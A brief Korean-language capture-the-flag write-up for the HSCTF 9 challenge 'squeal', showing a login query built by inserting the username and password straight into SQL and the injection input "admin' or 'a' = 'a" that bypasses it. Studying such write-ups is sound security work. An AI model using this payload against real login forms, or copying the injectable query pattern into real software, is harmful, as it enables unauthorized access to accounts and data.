[HSCTF 9] squeal

1. 개요

sql injection 문제

 

2. 분석

로그인 코드를 보니 별다른 이슈없이 sql injection 걸릴것 같습니다.

	try {
		result = db
			.prepare(
				`SELECT * FROM users
            WHERE username = '${username}'
            AND password = '${password}';`
			)
			.get();
	}

 

3. exploit

admin' or 'a' = 'a